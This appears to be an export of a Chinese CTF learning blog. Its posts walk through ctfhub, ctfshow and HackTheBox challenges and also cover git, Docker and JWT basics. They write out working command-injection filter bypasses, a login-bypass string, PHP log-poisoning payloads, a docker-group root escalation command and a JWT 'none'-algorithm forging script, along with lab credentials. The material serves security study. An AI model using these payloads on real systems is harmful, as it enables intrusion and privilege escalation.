<h2 id="文件包含"><a href="#文件包含" class="headerlink" title="文件包含"></a>文件包含</h2><p>这里使用 strpos 函数</p>
<blockquote>
<p>strpos:查找字符串首次出现的位置</p>
<p>int strpos ( string $haystack , mixed $needle [, int $offset &#x3D; 0 ] )</p>
</blockquote>
<p>题目使用</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span>(!<span class="title function_ invoke__">strpos</span>(<span class="variable">$_GET</span>[<span class="string">&quot;file&quot;</span>],<span class="string">&quot;flag&quot;</span>))&#123;<span class="comment">//无flag字符即可运行</span></span><br><span class="line">    <span class="keyword">include</span> <span class="variable">$_GET</span>[<span class="string">&quot;file&quot;</span>];</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>来包含文件，而下方给出的 shell.txt 含有 eval 漏洞</p>
<p>于是包含它（shell.txt 没有“flag”字符 所以这里 strpos 没影响）</p>
<p><img src= "C:\Users\CNsirius\AppData\Roaming\Typora\typora-user-images\image-20220218182857507.png" alt="image-20220218182857507"></p>
<p>通过 get(包含文件) post(传参)并用来得到 flag</p>
<h2 id="php-info"><a href="#php-info" class="headerlink" title="php info"></a>php info</h2><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if (isset($_GET[&#x27;file&#x27;]))&#123;</span><br><span class="line">	if ( substr($_GET[&quot;file&quot;], 0, 6) === &quot;php://&quot; ) &#123;</span><br><span class="line">        include($_GET[&quot;file&quot;]);</span><br><span class="line">         &#125;</span><br><span class="line">    else &#123;</span><br><span class="line">        echo &quot;Hacker!!!&quot;;</span><br><span class="line">    	&#125;&#125;</span><br><span class="line">else &#123;</span><br><span class="line">    highlight_file(__FILE__);&#125;?&gt;</span><br><span class="line">&lt;hr&gt;i don&#x27;t have shell, how to get flag? &lt;br&gt;&lt;a href=&quot;phpinfo.php&quot;&gt;phpinfo&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<p>点击 phpinfo 链接 可查看 php 环境</p>
<h3 id="php-input"><a href="#php-input" class="headerlink" title="php:&#x2F;&#x2F;input"></a>php:&#x2F;&#x2F;input</h3><figure class="highlight c++"><table><tr><td class="code"><pre><span class="line"><span class="comment">/*php:// — 访问各个输入/输出流（I/O streams）</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">PHP 提供了一些杂项输入/输出（IO）流，允许访问 PHP 的输入输出流、标准输入输出和错误描述符，   内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">php://input是个可以访问请求的原始数据的只读流。</span></span><br></pre></td></tr></table></figure>

<p><img src= "C:\Users\CNsirius\AppData\Roaming\Typora\typora-user-images\image-20220218162728184.png" alt="image-20220218162728184"></p>
<h2 id="读取源代码"><a href="#读取源代码" class="headerlink" title="读取源代码"></a>读取源代码</h2><p>看环境 无法使用 php:&#x2F;&#x2F;input</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">error_reporting(E_ALL);</span><br><span class="line">if (isset($_GET[&#x27;file&#x27;])) &#123;</span><br><span class="line">    if ( substr($_GET[&quot;file&quot;], 0, 6) === &quot;php://&quot; ) &#123;</span><br><span class="line">        include($_GET[&quot;file&quot;]);</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        echo &quot;Hacker!!!&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125; else &#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>但还必须是 php:&#x2F;&#x2F;开头</p>
<h3 id="php-filter"><a href="#php-filter" class="headerlink" title="php:&#x2F;&#x2F;filter"></a><a href="https://www.php.net/manual/zh/wrappers.php.php">php:&#x2F;&#x2F;filter</a></h3><p><img src= "C:\Users\CNsirius\AppData\Roaming\Typora\typora-user-images\image-20220219174206504.png" alt="image-20220219174206504"></p>
<p><img src= "C:\Users\CNsirius\AppData\Roaming\Typora\typora-user-images\image-20220219112308277.png" alt="image-20220219112308277"></p>
<h2 id="远程包含"><a href="#远程包含" class="headerlink" title="远程包含"></a>远程包含</h2><p>同 phpinfo 做法相同</p>
<h2 id="命令注入"><a href="#命令注入" class="headerlink" title="命令注入"></a>命令注入</h2><p>输入命令</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">127.0.0.1;ls</span><br></pre></td></tr></table></figure>

<p>然后 cat 时出现了问题</p>
<p>输出被限制了</p>
<p>于是用管道符号来限制输出 base64</p>
<p>得到后再解码</p>
<p><img src= "C:\Users\CNsirius\AppData\Roaming\Typora\typora-user-images\image-20220218170811553.png" alt="image-20220218170811553"></p>
<h2 id="过滤-cat"><a href="#过滤-cat" class="headerlink" title="过滤 cat"></a>过滤 cat</h2><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$res = FALSE;</span><br><span class="line">if (isset($_GET[&#x27;ip&#x27;]) &amp;&amp; $_GET[&#x27;ip&#x27;]) &#123;</span><br><span class="line">    $ip = $_GET[&#x27;ip&#x27;];</span><br><span class="line">    $m = [];</span><br><span class="line">    if (!preg_match_all(&quot;/cat/&quot;, $ip, $m)) &#123;//过滤了cat</span><br><span class="line">        $cmd = &quot;ping -c 4 &#123;$ip&#125;&quot;;</span><br><span class="line">        exec($cmd, $res);</span><br><span class="line">    &#125;</span><br><span class="line">    else &#123;</span><br><span class="line">        $res = $m;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br><span class="line"></span><br><span class="line">&lt;pre&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">    if ($res) &#123;</span><br><span class="line">        print_r($res);</span><br><span class="line">    &#125;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;/pre&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">	show_source(__FILE__);</span><br><span class="line">?&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<h2 id="more"><a href="#more" class="headerlink" title="more"></a>more</h2><p>Linux more 命令类似 cat ，不过会以一页一页的形式显示，更方便使用者逐页阅读，而最基本的指令就是按空白键（space）就往下一页显示，按 b 键就会往回（back）一页显示，而且还有搜寻字串的功能（与 vi 相似），使用中的说明文件，请按 h 。</p>
<figure class="highlight ini"><table><tr><td class="code"><pre><span class="line">more <span class="section">[-dlfpcsu]</span> <span class="section">[-num]</span> <span class="section">[+/pattern]</span> <span class="section">[+linenum]</span> <span class="section">[fileNames..]</span></span><br></pre></td></tr></table></figure>

<p><img src= "C:\Users\CNsirius\AppData\Roaming\Typora\typora-user-images\image-20220218171602745.png" alt="image-20220218171602745"></p>
<h2 id="过滤空格"><a href="#过滤空格" class="headerlink" title="过滤空格"></a>过滤空格</h2><p>在 linux 里空格可用&lt; 或 ${IFS}代替</p>
<p><img src= "C:\Users\CNsirius\AppData\Roaming\Typora\typora-user-images\image-20220218171910282.png" alt="image-20220218171910282"></p>
<h2 id="过滤运算符"><a href="#过滤运算符" class="headerlink" title="过滤运算符"></a>过滤运算符</h2><p>cat [file]|base64 还可以用 base64 [file]</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$res = FALSE;</span><br><span class="line">if (isset($_GET[&#x27;ip&#x27;]) &amp;&amp; $_GET[&#x27;ip&#x27;]) &#123;</span><br><span class="line">    $ip = $_GET[&#x27;ip&#x27;];</span><br><span class="line">    $m = [];</span><br><span class="line">    if (!preg_match_all(&quot;/(\||\&amp;)/&quot;, $ip, $m)) &#123;</span><br><span class="line">        $cmd = &quot;ping -c 4 &#123;$ip&#125;&quot;;</span><br><span class="line">        exec($cmd, $res);</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        $res = $m;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><img src= "C:\Users\CNsirius\AppData\Roaming\Typora\typora-user-images\image-20220219104650896.png" alt="image-20220219104650896"></p>
<h2 id="综合练习"><a href="#综合练习" class="headerlink" title="综合练习"></a>综合练习</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line">!<span class="title function_ invoke__">preg_match_all</span>(<span class="string">&quot;/(\||&amp;|;| |\/|cat|flag|ctfhub)/&quot;</span>, <span class="variable">$ip</span></span><br></pre></td></tr></table></figure>

<p>;可以用%0a(url 编码) cat 用 base64 flag 用正则 f*** *lag 等 空格用 ${IFS}</p>
<p><img src= "C:\Users\CNsirius\AppData\Roaming\Typora\typora-user-images\image-20220219105932534.png" alt="image-20220219105932534"></p>
<p><img src= "C:\Users\CNsirius\AppData\Roaming\Typora\typora-user-images\image-20220219110644693.png" alt="image-20220219110644693"><img src= "C:\Users\CNsirius\AppData\Roaming\Typora\typora-user-images\image-20220219110736333.png" alt="image-20220219110736333"></p>
]]></content>
      <categories>
        <category>web</category>
      </categories>
      <tags>
        <tag>web</tag>
        <tag>ctfhub</tag>
        <tag>rce</tag>
      </tags>
  </entry>
  <entry>
    <title>ctfshow黑盒测试</title>
    <url>/2023/07/ctfshow%E9%BB%91%E7%9B%92%E6%B5%8B%E8%AF%95/</url>
    <content><![CDATA[<h2 id="web380"><a href="#web380" class="headerlink" title="web380"></a>web380</h2><p>先看源码没发现啥</p>
<p>然后再点点看看功能</p>
<p>发现文章页的格式为</p>
<p><code>page_n.php</code></p>
<p>猜测为 sql 注入</p>
<p>直接在 n 处注入无效</p>
<p>尝试<code>?id=</code>处注入</p>
<p>发现报错</p>
<p><code>file_get_contents(1&#39;.php)</code></p>
<p><img src= "/img/image-20221018212038190.png" alt="image-20221018212038190"></p>
<p>直接读取 flag<code>?id=flag</code></p>
<p>flag 出现</p>
<h2 id="web381"><a href="#web381" class="headerlink" title="web381"></a>web381</h2><p>再次尝试上题思路，发现无回显</p>
<p>再次翻看源码</p>
<p>发现到 css 文件中出现了一个特殊地址</p>
<p><img src= "/img/image-20221018212406542.png" alt="image-20221018212406542"></p>
<p>尝试打开，之后回退文件地址</p>
<p>直到退至&#x2F;alsckdfy&#x2F;出现 flag</p>
<blockquote>
<p>一些文件的调用可能会来自某些特殊的地址</p>
<p>如本题中后台和前站共用同一个 css 文件</p>
<p>其他如通过 cdn、图床等溯源回网上仓库（github 等）</p>
<p>即可查到源码，或找到后台等特殊地址</p>
</blockquote>
<h2 id="web382-383"><a href="#web382-383" class="headerlink" title="web382-383"></a>web382-383</h2><p>继续访问上题出现的后台地址</p>
<p>发现出现了个后台登陆界面</p>
<p>既然难度是梯度上升</p>
<p>可以考虑弱密码或者万能密码</p>
<p>进入</p>
<p>flag get√</p>
<h2 id="web384"><a href="#web384" class="headerlink" title="web384"></a>web384</h2><blockquote>
<p>hint:密码前 2 位是小写字母，后三位是数字</p>
</blockquote>
<p>再次进入后台登录页面</p>
<p>用户名肯定是 admin</p>
<p>然后就是爆破密码</p>
<p>方法一：写个脚本生成密码字典</p>
<p>方法二：使用 burp 爆破时</p>
<p>将 password 设为两个变量</p>
<p><img src= "/img/image-20221019153048062.png" alt="image-20221019153048062"></p>
<p>$1 设置成小写字母长度：2</p>
<p><img src= "/img/image-20221019153017681.png" alt="image-20221019153017681"></p>
<p>$2 设置成 3 位数字</p>
<p><img src= "/img/image-20221019153029106.png" alt="image-20221019153029106"></p>
<p><code>password=xy123</code></p>
<h2 id="web385"><a href="#web385" class="headerlink" title="web385"></a>web385</h2><p>登陆界面进不去</p>
<p>扫目录</p>
<p>发现有 install 没删</p>
<p>重置管理员密码</p>
<p><img src= "/img/image-20221028144108992.png" alt="image-20221028144108992"></p>
<blockquote>
<p>一些网页模板的安装通常通过&#x2F;install 目录进行安装</p>
<p>部分开发人员忘记删除 install 等目录就会暴露出一些特殊的功能点</p>
<p>如重置密码功能点</p>
<p>模板名、版本号、配置信息等敏感信息</p>
</blockquote>
<p>重置后密码为 admin888</p>
<h2 id="web386"><a href="#web386" class="headerlink" title="web386"></a>web386</h2><p>再次访问 install 发现有个 lock.bat 给锁定住了</p>
<p><img src= "/img/image-20221028151039705.png" alt="image-20221028151039705"></p>
<p>最开始几道题是前端用了后端文件</p>
<p>这题回去访问前端的同名文件 即本来应该调用的前端页面</p>
<p>发现第一行注释</p>
<p><img src= "/img/image-20221028150737179.png" alt="image-20221028150737179"></p>
<p>访问 clear ：“清理成功”</p>
<p>回想到，install 里的 lock，直接删</p>
<p><code>clear.php?file=./install/lock.dat</code></p>
<p>这次访问 install 能重置了</p>
<p><img src= "/img/image-20221028151345438.png" alt="image-20221028151345438"></p>
<p>返回后台登录初始账户</p>
<h2 id="387"><a href="#387" class="headerlink" title="387"></a>387</h2><p>发现 robots</p>
<p><img src= "/img/image-20221028151846193.png" alt="image-20221028151846193"></p>
<p>提示 debug，访问</p>
<p>提示 file 不存在</p>
<p>尝试 get 进去个 file</p>
<p><img src= "/img/image-20221028152040695.png" alt="image-20221028152040695"></p>
<p><img src= "/img/image-20221028152143283.png" alt="image-20221028152143283"></p>
<p>使用 log 执行命令将 lock 删除</p>
<p><code>&lt;?php unlink(&#39;/var/www/html/install/lock.dat&#39;)；?&gt;</code></p>
<p><img src= "/img/image-20221028155008033.png" alt="image-20221028155008033"></p>
<p>还有种执行方式是将命令通过读取文件显示回显</p>
<p><code>&lt;?php system(&#39;==shell== &gt; /var/www/html/1.txt&#39;);?&gt;</code></p>
]]></content>
      <categories>
        <category>web</category>
      </categories>
      <tags>
        <tag>web</tag>
        <tag>ctfshow</tag>
      </tags>
  </entry>
  <entry>
    <title>git命令</title>
    <url>/2023/07/git/</url>
    <content><![CDATA[<h2 id="创建仓库命令"><a href="#创建仓库命令" class="headerlink" title="创建仓库命令"></a>创建仓库命令</h2><h3 id="init"><a href="#init" class="headerlink" title="init"></a>init</h3><p>git init 命令用于在目录中创建新的 Git 仓库。<br>在文件夹中，会被创建出一个.git 的一个隐藏文件，这时，本地库已经初始化完成.</p>
<h3 id="clone"><a href="#clone" class="headerlink" title="clone"></a>clone</h3><p>git clone 拷贝一个 Git 仓库到本地，让自己能够查看该项目，或者进行修改。<br>拷贝项目命令格式如下：</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">git clone [url]</span><br></pre></td></tr></table></figure>

<h2 id="提交与修改"><a href="#提交与修改" class="headerlink" title="提交与修改"></a>提交与修改</h2><h3 id="add"><a href="#add" class="headerlink" title="add"></a>add</h3><p>git add 命令可将该文件添加到暂存区。</p>
<p>添加一个或多个文件到暂存区</p>
<h3 id="commit"><a href="#commit" class="headerlink" title="commit"></a>commit</h3><p>git commit 命令将暂存区内容添加到本地仓库中。<br>提交暂存区到本地仓库中:</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">git commit -m [message]</span><br></pre></td></tr></table></figure>

<p>[message] 可以是一些备注信息。</p>
<h3 id="status"><a href="#status" class="headerlink" title="status"></a>status</h3><p>git status 命令用于查看在你上次提交之后是否有对文件进行再次修改。</p>
<h3 id="rm"><a href="#rm" class="headerlink" title="rm"></a>rm</h3><p>git rm 命令用于删除文件。<br>如果只是简单地从工作目录中手工删除文件，运行 git status 时就会在 Changes not staged for commit 的提示。</p>
<h3 id="mv"><a href="#mv" class="headerlink" title="mv"></a>mv</h3><p>git mv 命令用于移动或重命名一个文件、目录或软连接。</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">git mv [file] [newfile]</span><br></pre></td></tr></table></figure>

<p>如果新文件名已经存在，但还是要重命名它，可以使用 -f 参数：</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">git mv -f [file] [newfile]</span><br></pre></td></tr></table></figure>

<h2 id="远程操作"><a href="#远程操作" class="headerlink" title="远程操作"></a>远程操作</h2><h3 id="remote"><a href="#remote" class="headerlink" title="remote"></a>remote</h3><p>显示所有远程仓库：</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">git remote -v</span><br></pre></td></tr></table></figure>

<h3 id="pull"><a href="#pull" class="headerlink" title="pull"></a>pull</h3><p>git pull 命令用于从远程获取代码并合并本地的版本。</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">git pull &lt;远程主机名&gt; &lt;远程分支名&gt;:&lt;本地分支名&gt;</span><br></pre></td></tr></table></figure>

<h3 id="push"><a href="#push" class="headerlink" title="push"></a>push</h3><p>git push 命用于从将本地的分支版本上传到远程并合并。</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">git push &lt;远程主机名&gt; &lt;本地分支名&gt;:&lt;远程分支名&gt;</span><br></pre></td></tr></table></figure>
]]></content>
      <categories>
        <category>web</category>
      </categories>
      <tags>
        <tag>web</tag>
        <tag>git</tag>
      </tags>
  </entry>
  <entry>
    <title>hackthebox合集</title>
    <url>/2023/07/htb/</url>
    <content><![CDATA[<p>共做出三道题，前两道题 wp 正在补，但现在又有点想转去做 vulnhub</p>
<h2 id="easy"><a href="#easy" class="headerlink" title="easy"></a>easy</h2><h3 id="Shoppy"><a href="#Shoppy" class="headerlink" title="Shoppy"></a>Shoppy</h3><h4 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h4><p>老样子 先 nmap 扫下</p>
<p>有 22 和 80</p>
<p><img src= "/img/image-20221020162838813.png" alt="image-20221020162838813"></p>
<p>然后将域名加入 hosts</p>
<p>子域名扫描</p>
<p>可以使用 gobuster 或各种 fuzz 工具如 wfuzz</p>
<blockquote>
<p>本来想用 oneforall 扫子域名，试了半天一堆错误，后来问学长，oneforall 是调用了一堆子域名解析的</p>
</blockquote>
<p>扫到 mattermost.shoppy.htb 加进 hosts</p>
<p>打开发现是个登陆界面，先放着</p>
<p>跑下主站的域名 发现有个&#x2F;admin</p>
<h4 id="登录"><a href="#登录" class="headerlink" title="登录"></a>登录</h4><p>根据黑盒测试老套路，试试弱口令，不成功，试试万能密码跑下</p>
<p>发现<code>admin&#39;||&#39;&#39;===&#39;</code>成功进入</p>
<p>进入后发现搜索框，可进行大量尝试</p>
<p>当搜索到 admin 后出现 passwordhash</p>
<p>继续尝试后发现搜索<code>admin&#39;||&#39;&#39;===&#39;</code>会出现两个 hash</p>
<p>使用 hashcat 爆破</p>
<p><code>josh:remembermethisway</code></p>
<p>然后进入之前扫到的那个子域名尝试登陆，成功</p>
<p>又是 htb 经典频道页面</p>
<p>翻找后发现</p>
<p><img src= "/img/image-20221020204113936-16662696771111.png" alt="image-20221020204113936"></p>
<p>尝试使用 ssh 连接</p>
<p>password:Sh0ppyBest@pp!</p>
<p><img src= "/img/image-20221020203942821.png" alt="image-20221020203942821"></p>
<p>user get√</p>
<h4 id="root"><a href="#root" class="headerlink" title="root"></a>root</h4><p>ssh 进入后 ls 发现已经有老哥把经典 linepeas 传进去了</p>
<p>开跑！</p>
<p>然后爆出一堆 cve 先放一边</p>
<p>还在后面看到一些 password 字段的文件去看看</p>
<p><img src= "/img/image-20221020205247703.png" alt="image-20221020205247703"></p>
<p><img src= "/img/image-20221020210747666.png" alt="image-20221020210747666"></p>
<p>password:Sample</p>
<p>调用下密码管理器</p>
<p><img src= "/img/image-20221020210823274.png" alt="image-20221020210823274"></p>
<p>再次使用 ssh 登录 deploy 账户</p>
<p>进入后又没啥思路了</p>
<p>准备走 cve 了</p>
<p>走前看了眼 wp</p>
<p>发现聊天页下面还有段话</p>
<p><img src= "/img/image-20221020211115093.png" alt="image-20221020211115093"></p>
<p>发现 docker 部署尝试 docker 提权</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">docker run -v /:/mnt --rm -it alpine chroot /mnt sh</span><br></pre></td></tr></table></figure>

<p><img src= "/img/image-20221020211249861.png" alt="image-20221020211249861"></p>
<p>其实后来想想 linpeas 里出现了提示</p>
<p><img src= "/img/image-20221020211920140.png" alt="image-20221020211920140"></p>
<p>deplay 在 root 权限的 docker 组里，当时要是细看的话应该也能想到</p>
<p>后面跟着 wp 做 cve 也懒得去试了</p>
<p>最后给师傅们留下截图</p>
<p><img src= "/img/image-20221020212137224.png" alt="image-20221020212137224"></p>
<p>这回 cve 都没用，给个简单低评吧~</p>
]]></content>
      <categories>
        <category>web</category>
      </categories>
      <tags>
        <tag>web</tag>
        <tag>ctfshow</tag>
      </tags>
  </entry>
  <entry>
    <title>kali安装docker</title>
    <url>/2023/07/docker/</url>
    <content><![CDATA[<h2 id="kali-安装-docker"><a href="#kali-安装-docker" class="headerlink" title="kali 安装 docker"></a>kali 安装 docker</h2><figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">apt-get update</span><br><span class="line">apt-get install docker-engine</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash"><span class="comment"># 安装结束，打开docker服务</span></span></span><br><span class="line">service docker start</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash"><span class="comment"># 验证安装，运行测试样例</span></span></span><br><span class="line">docker --version</span><br><span class="line">docker run hello-world</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">测试</span></span><br></pre></td></tr></table></figure>

<h2 id="docker-常用命令"><a href="#docker-常用命令" class="headerlink" title="docker 常用命令"></a>docker 常用命令</h2><figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">docker --version</span><br><span class="line">docker images</span><br><span class="line">docker ps -a</span><br><span class="line">docker run -d --name 123 -p 127.0.0.1:80:80 镜像名</span><br><span class="line">docker stop 123</span><br></pre></td></tr></table></figure>

<p><a href="https://www.runoob.com/docker/docker-command-manual.html">其他常用命令见菜鸟教程</a></p>
<h2 id="dockers-底层原理"><a href="#dockers-底层原理" class="headerlink" title="dockers 底层原理"></a>dockers 底层原理</h2><h3 id="Namespaces"><a href="#Namespaces" class="headerlink" title="Namespaces"></a>Namespaces</h3><blockquote>
<p>命名空间是 Linux 为我们提供的<code>用于分离进程树、网络接口、挂载点以及进程间通信等资源</code>的方法。在日常使用 Linux 时，我们并没有运行多个完全分离的服务器的需要，但是如果我们在服务器上启动了多个服务，这些服务其实会相互影响的，每一个服务都能看到其他服务的进程，也可以访问宿主机器上的任意文件，这是很多时候我们都不愿意看到的，我们更希望运行在同一台机器上的不同服务能做到完全隔离，就像运行在多台不同的机器上一样。</p>
</blockquote>
<h3 id="CGroups"><a href="#CGroups" class="headerlink" title="CGroups"></a>CGroups</h3><blockquote>
<p>我们通过 Linux 的命名空间为新创建的进程隔离了文件系统、网络并与宿主机器之间的进程相互隔离，但是命名空间并不能够为我们<code>提供物理资源上的隔离</code>，比如 CPU 或者内存，如果在同一台机器上运行了多个对彼此以及宿主机器一无所知的『容器』，这些容器却共同占用了宿主机器的物理资源。<br>如果其中的某一个容器正在执行 CPU 密集型的任务，那么就会影响其他容器中任务的性能与执行效率，导致多个容器相互影响并且抢占资源。如何对多个容器的资源使用进行限制就成了解决进程虚拟资源隔离之后的主要问题，而 Control Groups（简称 CGroups）就是能够隔离宿主机器上的物理资源，例如 CPU、内存、磁盘 I&#x2F;O 和网络带宽。<br><code>在 CGroup 中，所有的任务就是一个系统的一个进程，而 CGroup 就是一组按照某种标准划分的进程，在 CGroup 这种机制中，所有的资源控制都是以 CGroup 作为单位实现的，每一个进程都可以随时加入一个 CGroup 也可以随时退出一个 CGroup。</code></p>
</blockquote>
]]></content>
      <categories>
        <category>web</category>
      </categories>
      <tags>
        <tag>web</tag>
        <tag>kali</tag>
        <tag>docker</tag>
      </tags>
  </entry>
  <entry>
    <title>linux动态加载</title>
    <url>/2023/07/linux%E5%8A%A8%E6%80%81%E5%8A%A0%E8%BD%BD/</url>
    <content><![CDATA[<h3 id="linux-动态加载"><a href="#linux-动态加载" class="headerlink" title="linux 动态加载"></a>linux 动态加载</h3><h2 id="查看环境"><a href="#查看环境" class="headerlink" title="查看环境"></a>查看环境</h2><p>先给了 755<br>他自己传了 flag 等于告诉我们在哪了<br>然后限到了 644<br>不想让我们直接看</p>
<blockquote>
<p>都到这一题了权限应该不用讲了</p>
</blockquote>
<p>提示给了 shell<br>且不需要提权<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254104587-61.png" alt="在这里插入图片描述"><br>于是需要新学一个东西<br>动态加载</p>
<h2 id="Linux-ELF-Dynaamic-Loader"><a href="#Linux-ELF-Dynaamic-Loader" class="headerlink" title="Linux ELF Dynaamic Loader"></a>Linux ELF Dynaamic Loader</h2><h3 id="elf-文件"><a href="#elf-文件" class="headerlink" title="elf 文件"></a>elf 文件</h3><p>elf 文件是 linux 下的可执行文件<br>文件头为 elf</p>
<blockquote>
<p>不知道是靶机还是蚁剑虚拟终端的问题 没法 vi<br>直接 cat 就能看到了</p>
<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254108304-64.png" alt="在这里插入图片描述"></p>
</blockquote>
<h3 id="动态库链接器-加载器"><a href="#动态库链接器-加载器" class="headerlink" title="动态库链接器&#x2F;加载器"></a>动态库链接器&#x2F;加载器</h3><ul>
<li>当需要动态链接的应用被操作系统加载时</li>
<li>系统必须要定位然后加载它所需要的所有动态库文件</li>
<li>在 Linux 环境下，这项工作是由 ld-linux.so.2 来负责完成的</li>
<li>执行操作时操作系统会将控制权交给 ld-linux.so</li>
<li>而不是交给程序正常的进入地址</li>
<li>ld-linux.so.2 会寻找然后加载所有需要的库文件，然后再将控制权交给应用的起始入口。</li>
</ul>
<h3 id="ldd-命令"><a href="#ldd-命令" class="headerlink" title="ldd 命令"></a>ldd 命令</h3><p>使用 ldd 命令即可查看<br>简便的 shell 命令依赖哪些动态加载库<br><img src= "/img/669b04b31dd04fe1a8d320ea2540ced2.png" alt="在这里插入图片描述"><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254114578-69.png" alt="在这里插入图片描述"></p>
<h2 id="姿势"><a href="#姿势" class="headerlink" title="姿势"></a>姿势</h2><p>在 cat elf 文件时<br>看到第一行后面&#x2F;lib64&#x2F;ld-linux-x86-64.so.2 动态库<br>并且在 ldd<br>可以看到 ls 和 cat 动用他了<br>用！<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254120768-72.png" alt="在这里插入图片描述">这是他的介绍<br>执行</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">/lib64/ld-linux-x86-64.so.2 /readflag</span><br></pre></td></tr></table></figure>

<p>get</p>
]]></content>
      <categories>
        <category>web</category>
      </categories>
      <tags>
        <tag>web</tag>
        <tag>ctfhub</tag>
        <tag>linux</tag>
        <tag>动态加载</tag>
      </tags>
  </entry>
  <entry>
    <title>ctfhub-jwt</title>
    <url>/2023/07/jwt/</url>
    <content><![CDATA[<h2 id="基础知识"><a href="#基础知识" class="headerlink" title="基础知识"></a>基础知识</h2><p>题目附件：<a href="https://www.wolai.com/ctfhub/hcFRbVUSwDUD1UTrPJbkob">jwt 基础知识</a></p>
<p>flag 在下面</p>
<p>需要了解一下 jwt 组成部分</p>
<h2 id="敏感信息泄露"><a href="#敏感信息泄露" class="headerlink" title="敏感信息泄露"></a>敏感信息泄露</h2><p>随便输个</p>
<p>进去查消息头</p>
<p>然后在</p>
<p><a href="https://jwt.io/">jwt.io</a></p>
<p>decode 一共两部分 ag 是另一半<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254077114-40.png" alt="请添加图片描述"></p>
<h2 id="无签名"><a href="#无签名" class="headerlink" title="无签名"></a>无签名</h2><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> jwt</span><br><span class="line">algorithm=<span class="string">&quot;none&quot;</span></span><br><span class="line">payload = &#123;</span><br><span class="line">  <span class="string">&quot;username&quot;</span>: <span class="string">&quot;admin&quot;</span>,</span><br><span class="line">  <span class="string">&quot;password&quot;</span>: <span class="string">&quot;admin&quot;</span>,</span><br><span class="line">  <span class="string">&quot;role&quot;</span>:<span class="string">&quot;admin&quot;</span></span><br><span class="line">  &#125;</span><br><span class="line">key = <span class="string">&quot;&quot;</span></span><br><span class="line">encoded = jwt.encode(payload,key,algorithm)</span><br><span class="line"><span class="built_in">print</span>(encoded)</span><br></pre></td></tr></table></figure>

<p>jwt 的签名可以为无</p>
<blockquote>
<p>今天写这个脚本的时候命名为 jwt.py</p>
<p>结果报错 但是系统环境运行正常</p>
<p>才知道是文件名的事</p>
<p>import jwt 他先自己引用自己了</p>
</blockquote>
<p>抓包</p>
<p>把 cookie 里的 token 改为这脚本的运行结果</p>
<h2 id="弱密钥"><a href="#弱密钥" class="headerlink" title="弱密钥"></a>弱密钥</h2><p>需要用到<a href="https://github.com/brendan-rius/c-jwt-cracker">jwt-cracker</a></p>
<p>依次执行即可</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">git clone https://github.com/brendan-rius/c-jwt-cracker</span><br><span class="line">./c-jwt-cracker</span><br><span class="line">make</span><br><span class="line">./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6IjEiLCJwYXNzd29yZCI6IjEiLCJyb2xlIjoiZ3Vlc3QifQ.w4i8KWRWmY_xTYtRnFZnp5vLIxPG2abCly6lW6QxTKs</span><br></pre></td></tr></table></figure>

<p>然后得出该 jwt 密钥</p>
<p>然后放之前那个网站</p>
<p>改 role 为 admin</p>
